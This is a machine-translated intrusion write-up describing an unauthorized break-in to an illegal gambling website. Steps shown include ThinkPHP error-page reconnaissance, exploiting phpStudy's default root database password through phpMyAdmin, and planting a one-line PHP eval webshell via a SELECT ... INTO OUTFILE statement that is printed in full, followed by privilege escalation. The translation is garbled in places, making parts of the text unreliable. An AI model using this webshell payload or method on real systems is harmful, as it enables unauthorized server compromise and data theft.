Title: Recording the process of penetrating illegal spinach site

1. Cause

There have been many cases of illegal spinach gambling in China in recent years. This time I will explain how I penetrated the next illegal spinach website. This infiltration was purely luck + the negligence of the webmaster, which can be said to be the destruction of a thousand-year-old embankment in the ant nest. In order to ensure readers' understanding, the intruder's identity is specially used to document it!

2. Scouting and collecting information

Open the target site and found it was a spinach website, and then started collecting information.

Whois information query of the domain name learned that the domain name comes from Western Digital

Here I use the webmaster's ping tool to see if there is a CDN used and query the server room location. From whois results, I learned that DNS Pod is using DNS Pod, but those who have experienced it know that general large IDC manufacturers have their own DNS, so the agents use DNS Pod

It is obvious that this domain name was registered on the agent. I originally prepared a social work domain name, but it was meaningless. Others still used the same thing after they came back after parsing it. F4ther wrote an article before saying that it was a honeypot and fishing to hijack the safety pulse. But it's too troublesome, just skip it and penetrate it directly.

I saw that the URL is home/Change/AlipayInfo/alipay/WeChat.html. My first hunch is the program written using the ThinkPHP framework.

In order to verify my guess, I specially entered the address to see if it reported an error. Generally, the version + physical path will be displayed when reporting an error to ThinkPHP. As a result, if you have a look at the point on the picture, you can get the following information

1. This site uses the ThinkPHP3.2.2 framework.

2. Physical Road Force C:\WWW\pcdd\pc

3. This website does not use CDN

4. This website server is overseas (Canada).

5. There must be loopholes in this website.

3. Start the battle

I found a direct SQLmap test, and the result is as follows. It is protected and directly blocked by the wall, which makes it impossible to continue. Connect to a VPN

Look again, if you can't find a way to protect it, directly access the ping IP 47.xx.xx.xx, and find a phpstudy probe

In phpstudy, the default database password is root, so we start to try weak passwords

I found out that he was a weak password. So I'm visiting 47.xx.xx.xx/phpmyadmin. Unfortunately, it was walled again, which means that this firewall is a bit of a waste. Change the node and log in directly.

Later, use the SQL statement to export a sentence Trojan, log in and click SQL, and then execute the statement

select '?php @eval($_POST[1])?' into outfile 'C:\/WWW\/pcdd\/pc\/log1.php';

The purpose of using double slashes here and one slash is inverted is to be afraid that it will not be able to parse the slashes directly, and then it will be blocked again because of executing the SQL statement.

After that, I directly used the kitchen knife and changed the node. Because I executed the SQL statement, it must have been blocked, so I changed the node directly.

Remember, at this time, you will be flipping the directory in the shell. The 100 nodes on the wall are not enough for you to flip. You can directly execute the statement to increase the authority, and then connect to the server. The webmaster here fixes the vulnerability, and the Trojan naturally no longer exists and cannot be reproduced. However, the webmaster did not delete my account.

found that he uses Alibaba Cloud's rds database, and his password is quite complicated.

IV. Summary

1. His website uses cloud database site database separation. First, it is safer, and second, it is better to process data, but because it neglects the weak password of the local environment database, it is invaded. 2. Details are really important, such as information collection. Many people have been staring at the target station for a long time and have not gained anything. At this time, you might as well take a look at its windows and back doors. This article directly accesses the IP and discovers the environment configuration and probes. Only then can you come in so smoothly. 3. The basics are very important. For example, you don’t know the default password and default address of the phpstudy environment. What if the default password of phpstudy is something else? I don’t know that the default permissions are system4. Be careful when doing things and must minimize the workload. For example, when executing a sql statement, it is very likely that phpmyadmin will be parsed into C:WWW or something, so it is best to bring double slashes backslashes with you every time you test them, and it will not have any effect anyway. For example, if you want to flip the directory, you will definitely be walled. At least one minute will be wasted to change nodes. Friends who have done public tests know that public tests are racing against time. So I directly raised the authority in this case due to the firewall. 5. Don’t be lazy when building your own website. Make all permissions perfect and minimize the risk of being hacked.

Reprinted from the original link: https://mp.weixin.qq.com/s/3y894HT1uBBGdifbIToQZQ